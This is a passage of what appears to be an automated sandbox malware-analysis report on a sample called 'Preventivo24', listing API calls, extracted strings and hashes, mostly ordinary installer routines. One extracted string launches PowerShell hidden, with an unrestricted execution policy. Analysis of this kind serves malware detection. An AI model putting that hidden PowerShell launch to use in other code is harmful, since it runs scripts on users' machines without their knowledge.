                                                                              • InitializeCriticalSection.KERNEL32(011D3180,B5580983,?), ref: 00FC7263
                                                                              • EnterCriticalSection.KERNEL32(011D3180,B5580983), ref: 00FC7278
                                                                              • GetCurrentProcess.KERNEL32 ref: 00FC7285
                                                                              • GetCurrentThread.KERNEL32 ref: 00FC7293
                                                                              • SymSetOptions.IMAGEHLP(80000016), ref: 00FC72C1
                                                                              • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 00FC7338
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00FC733F
                                                                              • SymInitialize.IMAGEHLP(00000000,00000000,00000001,01142730,00000000), ref: 00FC7385
                                                                              • StackWalk.IMAGEHLP(0000014C,?,00000000,?,?,00000000,00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00FC74C1
                                                                              • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 00FC757A
                                                                              • SymCleanup.IMAGEHLP(00000000,00000000), ref: 00FC7693
                                                                              • LeaveCriticalSection.KERNEL32(011D3180,?,00000000), ref: 00FC76BE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$CurrentInitialize$AddressCleanupEnterHandleLeaveLibraryLoadModuleOptionsProcProcessStackThreadWalk
                                                                              • String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                              • API String ID: 4282195395-80696534
                                                                              • Opcode ID: 1ff2b32f3b9c7ca0cc14cd5563b6c7368f37b653206a5f4373a0770c474d7c9c
                                                                              • Instruction ID: c4d26b52810600a5b9653372985e6ad84e056e4523be2f26b3372600fe1920e3
                                                                              • Opcode Fuzzy Hash: 1ff2b32f3b9c7ca0cc14cd5563b6c7368f37b653206a5f4373a0770c474d7c9c
                                                                              • Instruction Fuzzy Hash: 2FD1BC70D086999FDB28EF24CD4ABEEBBB5AF04305F0001DAE859A7281DB745B84DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              • ps1, xrefs: 00FFDD41, 00FFDD53, 00FFDD5D
                                                                              • Unable to create process: , xrefs: 00FFDEB8
                                                                              • Unable to find file , xrefs: 00FFDCB6
                                                                              • powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new, xrefs: 00FFDE13
                                                                              • Unable to retrieve exit code from process., xrefs: 00FFE037
                                                                              • Unable to get a temp file for script output, temp path: , xrefs: 00FFDDB7
                                                                              • txt, xrefs: 00FFDD6E
                                                                              • Unable to retrieve PowerShell output from file: , xrefs: 00FFE014
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Unable to create process: $Unable to find file $Unable to get a temp file for script output, temp path: $Unable to retrieve PowerShell output from file: $Unable to retrieve exit code from process.$powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new$ps1$txt
                                                                              • API String ID: 0-4129021124
                                                                              • Opcode ID: 6ca92cb10186cb078308656189ac18f8179113f6ed2143698d842bf4ffca9eb6
                                                                              • Instruction ID: b15149ab7775e8210083f708597d86370ba2c584ae235db8cb0c0f337f30f3d0
                                                                              • Opcode Fuzzy Hash: 6ca92cb10186cb078308656189ac18f8179113f6ed2143698d842bf4ffca9eb6
                                                                              • Instruction Fuzzy Hash: D3D1EC31D00609EFDB14DFA8C905BAEFBB5BF08320F148159E525B72A1DB74AA41CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(Advapi32.dll,B5580983,00000000,00000000), ref: 00FB9711
                                                                              • GetLastError.KERNEL32 ref: 00FB973F
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 00FB9755
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00FB9771
                                                                              • GetLastError.KERNEL32 ref: 00FB977E
                                                                              • GetLastError.KERNEL32 ref: 00FB9975
                                                                              • GetLastError.KERNEL32 ref: 00FB99DA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                                              • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                              • API String ID: 3460774402-1129428314
                                                                              • Opcode ID: a1189ab88b73464df440473e9ebfe3e7cf36c69b2d21ad57c2d84b2acbca8e54
                                                                              • Instruction ID: c8ecae7c0ff4d2a244a2338e8aeae620dfbb69405b18b5f249c0f5dd61af9109
                                                                              • Opcode Fuzzy Hash: a1189ab88b73464df440473e9ebfe3e7cf36c69b2d21ad57c2d84b2acbca8e54
                                                                              • Instruction Fuzzy Hash: 9CF169B1C09209EBDB10DFA5D9447EEBBB4FF49310F208119EA15B7280E774AA44DFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 00EC2718
                                                                              • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 00EC272A
                                                                              • GetProcAddress.KERNEL32(00000000,ShutdownEmbeddedUI), ref: 00EC2738
                                                                              • GetProcAddress.KERNEL32(00000000,EmbeddedUIHandler), ref: 00EC2747
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Heap$AllocateLibraryLoadProcess
                                                                              • String ID: build $21.3.1$69aaef70$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
                                                                              • API String ID: 230625546-1630969157
                                                                              • Opcode ID: d939d3f4a9bd96b62427423020a15850aa48250eeea14734fd6d532d543749e9
                                                                              • Instruction ID: f8f465d789fbd7eb3d38c8617f769128987a7c75f3c6f03ceb4b6ab1eaaef18e
                                                                              • Opcode Fuzzy Hash: d939d3f4a9bd96b62427423020a15850aa48250eeea14734fd6d532d543749e9
                                                                              • Instruction Fuzzy Hash: 9CD1E175E002099FCB18EF64C955BAEBBB5FF48714F14422DE825B7381EB35AA05CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,B5580983,00000000,?,?,?,?,?,?,?,?,?,?,?,B5580983), ref: 00E91303
                                                                              • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00E91309
                                                                              • LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,01142730,00000000,00000000,00000000), ref: 00E914CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$AddressProc
                                                                              • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                                              • API String ID: 1469910268-2454113998
                                                                              • Opcode ID: 0045f95ad7b7d8ee59c699c314cf7f3db65592818d838011be5ffc3251cbcd24
                                                                              • Instruction ID: 5b5aa919a1109112ce51abacb61eeaf626f967039d18c3e44401a86499e06f14
                                                                              • Opcode Fuzzy Hash: 0045f95ad7b7d8ee59c699c314cf7f3db65592818d838011be5ffc3251cbcd24
                                                                              • Instruction Fuzzy Hash: EFB18A70D0021AEFCF24EFA8D845BAEBBB5EF58704F1581A9E811B7290DB709D44CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,B5580983,?), ref: 00FC6937
                                                                              • SymSetSearchPath.IMAGEHLP(B5580983,?,B5580983,?), ref: 00FC6B98
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleNamePathSearch
                                                                              • String ID: *** Stack Trace (x86) ***$ -> $%hs()$%hs:%ld$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                                              • API String ID: 1980563475-1582651777
                                                                              • Opcode ID: 4b0b82a32e67fc5e1a8efe948051d18c34aa3aef73f20f59a491c10af2ba6fff
                                                                              • Instruction ID: 71b762190e66d66b7d4f7e23b1f2d8dfe5be5c71dcd81a5e2e6f1462c5ea5929
                                                                              • Opcode Fuzzy Hash: 4b0b82a32e67fc5e1a8efe948051d18c34aa3aef73f20f59a491c10af2ba6fff
                                                                              • Instruction Fuzzy Hash: 9491B971D04569CFCB28DF24CD46BECB7B4AB4A324F1082EAE559A7291DB345E84CF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00FCC816
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00FCC81D
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,00000000), ref: 00FCC857
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCurrentHandleModuleProcProcess
                                                                              • String ID: An acceptable version was found.$IsWow64Process2$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
                                                                              • API String ID: 4190356694-1658165007
                                                                              • Opcode ID: 0355dce7238610539ee5d02700bd953ea0d553a622a5f3c376e737a72576a8e5
                                                                              • Instruction ID: 2c029188b1edb7ebf26bdd128daaba2f0df551742582156f79c6d3c864b9a2ea
                                                                              • Opcode Fuzzy Hash: 0355dce7238610539ee5d02700bd953ea0d553a622a5f3c376e737a72576a8e5
                                                                              • Instruction Fuzzy Hash: F3029171D0060ADFDB14DFA8CA46BAEB7B2FF44324F14421DE429A7290DB35AD46DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,B5580983), ref: 00EBC2F8
                                                                                • Part of subcall function 00E9A370: SetWindowLongW.USER32(?,000000FC,00000000), ref: 00E9A3B2
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00EBC403
                                                                              • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 00EBC417
                                                                              • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 00EBC42C
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 00EBC441
                                                                              • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 00EBC458
                                                                              • GetWindowRect.USER32(?,?), ref: 00EBC48A
                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 00EBC4E6
                                                                              • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00EBC4FA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateLongRect
                                                                              • String ID: tooltips_class32
                                                                              • API String ID: 1954517558-1918224756
                                                                              • Opcode ID: a9408a551d6b761ea92f5bf79abdc443a28e34747e51135023688153041a619f
                                                                              • Instruction ID: 4b17cab4a37ee96994d978ce3fc1383ceb03589f2ea93f4e158e47e06d430f44
                                                                              • Opcode Fuzzy Hash: a9408a551d6b761ea92f5bf79abdc443a28e34747e51135023688153041a619f
                                                                              • Instruction Fuzzy Hash: BA915DB1A01219AFDB14CFA5CC55BEEBBF9FB48300F10852AF516EB294D774A904CB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(011D0080,B5580983,-00000001), ref: 00FF65FC
                                                                              • EnterCriticalSection.KERNEL32(-00000001,B5580983,-00000001), ref: 00FF6609
                                                                              • WriteFile.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF663B
                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF6644
                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,01142700,00000001,?,?,B5580983,00000000), ref: 00FF66DC
                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF66E5
                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,B5580983,00000000), ref: 00FF6728
                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF6731
                                                                              • WriteFile.KERNEL32(00000000,000000FF,?,?,00000000,011456A4,00000002,?,?,B5580983,00000000), ref: 00FF679E
                                                                              • FlushFileBuffers.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF67A7
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?,B5580983,00000000), ref: 00FF67E6
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$BuffersFlushWrite$CriticalSection$EnterFindInitializeLeaveResource
                                                                              • String ID:
                                                                              • API String ID: 1900893598-0
                                                                              • Opcode ID: 49788ab709614c1c545e516c8d1e07266c266473dd52f4b3546f63a1b55d340d
                                                                              • Instruction ID: 920b2b228235c4dfac012ee118ee32e4c2b768e053c290351edde4ea0edede8e
                                                                              • Opcode Fuzzy Hash: 49788ab709614c1c545e516c8d1e07266c266473dd52f4b3546f63a1b55d340d
                                                                              • Instruction Fuzzy Hash: E271AA35A00208AFDB15DF68C949BADBBB5EF08324F1441A8F921E73A1DB359D01DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 00FA1CC0: GetLastError.KERNEL32(B5580983,01100BFD,01100BFD,01100BFD,?,00000000,010F23FD,000000FF,?,80070057,00000000,?,?,01100BFD,00FB90AA,00000000), ref: 00FA1D31
                                                                              • GetProcAddress.KERNEL32(?,GetPackagePath), ref: 00FF7F1F
                                                                              • GetProcAddress.KERNEL32(?,GetPackagePath), ref: 00FF7F88
                                                                              • GetLastError.KERNEL32(?,?,01100EE5,000000FF,?,00FD68D0,?,?,?,?,?,?,00000000), ref: 00FF7FB2
                                                                              • FreeLibrary.KERNEL32(?,?,?,00000000,00000000,?,?,01100EE5,000000FF), ref: 00FF80B4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc$FreeLibrary
                                                                              • String ID: GetPackagePath$Kernel32.dll$neutral$x64$x86
                                                                              • API String ID: 329358263-4043905686
                                                                              • Opcode ID: 32e8e6e4e18f0e218393ffa93826610fe1b50db2a14f6b3dd75fa208ac357850
                                                                              • Instruction ID: feafd6e256cdcd3fea431e20fafd62d117ec05efae69d956b1790d9b624d940e
                                                                              • Opcode Fuzzy Hash: 32e8e6e4e18f0e218393ffa93826610fe1b50db2a14f6b3dd75fa208ac357850
                                                                              • Instruction Fuzzy Hash: 95C15C74A002099FDB18DFA8C998AADFBB1FF08314F148169E915E73A1EB759D05CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(011D536C,B5580983,00000000,?,?,?,?,?,?,00E98169,010B530D,000000FF), ref: 00E98A3D
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00E98AB8
